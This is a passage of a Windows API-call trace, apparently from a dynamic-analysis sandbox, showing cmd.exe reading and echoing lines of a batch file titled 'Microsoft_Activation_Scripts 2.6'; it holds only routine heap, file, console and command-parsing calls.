bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe610*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode 76, 30", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe5f8 | out: lpCommandLine="mode 76, 30", lpProcessInformation=0x43f9efe5f8*(hProcess=0xa0, hThread=0x9c, dwProcessId=0xf08, dwThreadId=0xf14)) returned 1 [0180.335] CloseHandle (hObject=0x9c) returned 1 [0180.336] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.336] GetProcessHeap () returned 0x19a8f1e0000 [0180.337] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20a840) returned 1 [0180.337] GetEnvironmentStringsW () returned 0x19a8f203a00* [0180.337] GetProcessHeap () returned 0x19a8f1e0000 [0180.337] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x100e) returned 0x19a8f209820 [0180.337] memcpy (in: _Dst=0x19a8f209820, _Src=0x19a8f203a00, _Size=0x100e | out: _Dst=0x19a8f209820) returned 0x19a8f209820 [0180.337] FreeEnvironmentStringsA (penv="=") returned 1 [0180.337] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0180.694] GetExitCodeProcess (in: hProcess=0xa0, lpExitCode=0x43f9efe578 | out: lpExitCode=0x43f9efe578*=0x0) returned 1 [0180.694] CloseHandle (hObject=0xa0) returned 1 [0180.694] _vsnwprintf (in: _Buffer=0x43f9efe738, _BufferCount=0x13, _Format="%08X", _ArgList=0x43f9efe588 | out: _Buffer="00000000") returned 8 [0180.694] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.694] GetProcessHeap () returned 0x19a8f1e0000 [0180.695] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f209820) returned 1 [0180.695] GetEnvironmentStringsW () returned 0x19a8f203a00* [0180.695] GetProcessHeap () returned 0x19a8f1e0000 [0180.695] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x100e) returned 0x19a8f209820 [0180.696] memcpy (in: _Dst=0x19a8f209820, _Src=0x19a8f203a00, _Size=0x100e | out: _Dst=0x19a8f209820) returned 0x19a8f209820 [0180.696] FreeEnvironmentStringsA (penv="=") returned 1 [0180.696] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.696] GetProcessHeap () returned 0x19a8f1e0000 [0180.696] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f209820) returned 1 [0180.696] GetEnvironmentStringsW () returned 0x19a8f203a00* [0180.696] GetProcessHeap () returned 0x19a8f1e0000 [0180.696] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x100e) returned 0x19a8f209820 [0180.696] memcpy (in: _Dst=0x19a8f209820, _Src=0x19a8f203a00, _Size=0x100e | out: _Dst=0x19a8f209820) returned 0x19a8f209820 [0180.696] FreeEnvironmentStringsA (penv="=") returned 1 [0180.696] GetProcessHeap () returned 0x19a8f1e0000 [0180.696] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6c0) returned 1 [0180.697] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe6f0 | out: lpAttributeList=0x43f9efe6f0) [0180.697] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.697] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.697] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.697] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.697] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.697] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.697] SetConsoleInputExeNameW () returned 0x1 [0180.697] GetConsoleOutputCP () returned 0x1b5 [0180.698] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.698] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.698] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.698] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.698] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.698] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9204, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23f4 [0180.698] GetProcessHeap () returned 0x19a8f1e0000 [0180.699] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa080) returned 1 [0180.699] GetProcessHeap () returned 0x19a8f1e0000 [0180.700] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0180.700] GetProcessHeap () returned 0x19a8f1e0000 [0180.700] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fbef0) returned 1 [0180.700] GetProcessHeap () returned 0x19a8f1e0000 [0180.700] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200e40) returned 1 [0180.701] GetProcessHeap () returned 0x19a8f1e0000 [0180.701] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a70) returned 1 [0180.701] GetProcessHeap () returned 0x19a8f1e0000 [0180.701] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20c8d0) returned 1 [0180.701] GetProcessHeap () returned 0x19a8f1e0000 [0180.702] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eacb0) returned 1 [0180.702] GetProcessHeap () returned 0x19a8f1e0000 [0180.702] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0180.702] GetProcessHeap () returned 0x19a8f1e0000 [0180.702] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1faef0) returned 1 [0180.702] GetProcessHeap () returned 0x19a8f1e0000 [0180.703] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200de0) returned 1 [0180.703] GetProcessHeap () returned 0x19a8f1e0000 [0180.704] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0180.704] GetProcessHeap () returned 0x19a8f1e0000 [0180.704] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.704] GetProcessHeap () returned 0x19a8f1e0000 [0180.704] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0180.704] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.704] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23f4 [0180.704] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.705] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9206, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23f6 [0180.705] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nde 76, 30\r\noft_Activation_Scripts %masver%\r\n============================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 2 [0180.705] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.705] GetFileType (hFile=0xa0) returned 0x1 [0180.705] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.705] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23f6 [0180.705] GetProcessHeap () returned 0x19a8f1e0000 [0180.705] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.705] GetProcessHeap () returned 0x19a8f1e0000 [0180.706] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.721] _tell (_FileHandle=3) returned 9206 [0180.721] _close (_FileHandle=3) returned 0 [0180.722] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.722] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.722] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.722] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9206, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23f6 [0180.722] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.722] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23f6 [0180.722] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.722] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9213, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23fd [0180.722] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n, 30\r\noft_Activation_Scripts %masver%\r\n============================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 7 [0180.722] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.722] GetFileType (hFile=0xa0) returned 0x1 [0180.722] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.722] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23fd [0180.723] GetProcessHeap () returned 0x19a8f1e0000 [0180.723] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.723] GetProcessHeap () returned 0x19a8f1e0000 [0180.724] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.724] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.724] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.724] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.724] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.725] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.725] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.725] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.725] GetProcessHeap () returned 0x19a8f1e0000 [0180.725] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0180.725] GetProcessHeap () returned 0x19a8f1e0000 [0180.725] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0180.725] _tell (_FileHandle=3) returned 9213 [0180.725] _close (_FileHandle=3) returned 0 [0180.725] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.725] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.725] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.725] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.725] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.725] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.725] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.725] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.725] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.725] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.725] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.725] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.725] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.725] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.725] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.725] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.725] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.726] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.726] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.726] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.726] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.726] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.726] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.726] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.726] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.726] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.726] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.726] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.726] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.726] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.726] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.726] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.726] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.726] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.726] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.726] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.726] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.726] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.726] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.726] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.726] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.726] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.726] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.726] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.727] GetLastError () returned 0x7b [0180.727] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.727] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.727] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.727] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.727] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.727] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.727] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.727] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.727] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.727] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.728] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.728] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.728] GetProcessHeap () returned 0x19a8f1e0000 [0180.728] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.728] GetProcessHeap () returned 0x19a8f1e0000 [0180.728] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc20 [0180.728] GetProcessHeap () returned 0x19a8f1e0000 [0180.728] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ecc20, Size=0x16) returned 0x19a8f1ec8e0 [0180.728] GetProcessHeap () returned 0x19a8f1e0000 [0180.728] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec8e0) returned 0x16 [0180.728] GetProcessHeap () returned 0x19a8f1e0000 [0180.728] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb920 [0180.728] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer="\r\n") returned 2 [0180.728] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.728] GetFileType (hFile=0x24) returned 0x2 [0180.728] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.728] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.728] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.728] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x2) returned 1 [0180.729] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.729] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.729] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.729] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.729] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.729] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.730] SetConsoleInputExeNameW () returned 0x1 [0180.730] GetConsoleOutputCP () returned 0x1b5 [0180.730] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.730] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.730] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.730] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.730] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.730] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9213, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23fd [0180.730] GetProcessHeap () returned 0x19a8f1e0000 [0180.730] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0180.730] GetProcessHeap () returned 0x19a8f1e0000 [0180.731] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec8e0) returned 1 [0180.731] GetProcessHeap () returned 0x19a8f1e0000 [0180.731] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.731] GetProcessHeap () returned 0x19a8f1e0000 [0180.731] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.731] GetProcessHeap () returned 0x19a8f1e0000 [0180.731] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0180.731] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.731] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23fd [0180.732] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.732] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9220, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2404 [0180.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n, 30\r\noft_Activation_Scripts %masver%\r\n============================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 7 [0180.732] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.732] GetFileType (hFile=0xa0) returned 0x1 [0180.732] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.732] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2404 [0180.732] GetProcessHeap () returned 0x19a8f1e0000 [0180.732] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.732] GetProcessHeap () returned 0x19a8f1e0000 [0180.733] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.734] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.734] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.734] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.734] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.734] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.734] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.734] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.734] GetProcessHeap () returned 0x19a8f1e0000 [0180.734] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0180.734] GetProcessHeap () returned 0x19a8f1e0000 [0180.734] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.734] _tell (_FileHandle=3) returned 9220 [0180.734] _close (_FileHandle=3) returned 0 [0180.734] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.734] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.734] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.734] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.734] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.734] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.734] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.734] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.734] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.734] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.735] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.735] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.735] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.735] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.735] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.735] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.735] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.735] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.735] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.735] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.735] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.735] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.735] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.735] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.735] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.735] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.735] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.735] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.735] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.735] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.735] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.735] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.735] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.735] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.735] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.735] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.735] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.735] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.735] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.735] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.735] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.736] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.736] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.736] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.736] GetLastError () returned 0x7b [0180.736] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.736] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.737] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.737] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.737] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.737] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.737] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.737] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.737] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.737] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.737] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.737] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.737] GetProcessHeap () returned 0x19a8f1e0000 [0180.737] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb920 [0180.737] GetProcessHeap () returned 0x19a8f1e0000 [0180.737] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec7c0 [0180.738] GetProcessHeap () returned 0x19a8f1e0000 [0180.738] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ec7c0, Size=0x16) returned 0x19a8f1ec800 [0180.738] GetProcessHeap () returned 0x19a8f1e0000 [0180.738] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec800) returned 0x16 [0180.738] GetProcessHeap () returned 0x19a8f1e0000 